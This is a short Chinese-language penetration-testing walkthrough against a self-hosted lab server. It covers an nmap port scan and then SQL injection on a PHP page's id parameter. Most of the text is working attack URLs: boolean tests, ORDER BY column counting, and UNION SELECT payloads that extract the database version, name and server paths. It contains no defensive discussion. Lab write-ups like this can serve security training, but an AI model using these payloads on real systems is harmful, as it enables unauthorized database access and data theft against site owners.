1. 信息收集
内网搭建的一个服务器
nmap扫描服务器端口
nmap -sV -sC -sT -p- 192.168.20.157
可以看到22、80、8080端口都是开启的 可以针对他们的版本号网上搜集漏洞来利用
这里就只访问80端口的web页面
寻找可能存在sql注入的目录 测试该子目录是否存在sql注入
http://192.168.20.157/storypage_04.php?id=115%20and%201=1
http://192.168.20.157/storypage_04.php?id=115%20and%201=2
确定存在sql注入
2. sql注入漏洞利用
获取服务器和数据的信息
通过order by 命令来判断当前表的列数为13
http://192.168.20.157/storypage_04.php?id=115%20order%20by%2013
http://192.168.20.157/storypage_04.php?id=115%20order%20by%2014
通过union联合查询来知道显示的列数是什么位置
http://192.168.20.157/storypage_04.php?id=-115%20union%20select%20111,222,333,444,555,666,777,888,999,1010,1111,1212,1313
通过union注入点获取数据库和系统的相关信息
http://192.168.20.157/storypage_04.php?id=-115%20union%20select%20version(),database(),3,4,5,6,@@basedir,8,9,10,11,@@datadir,13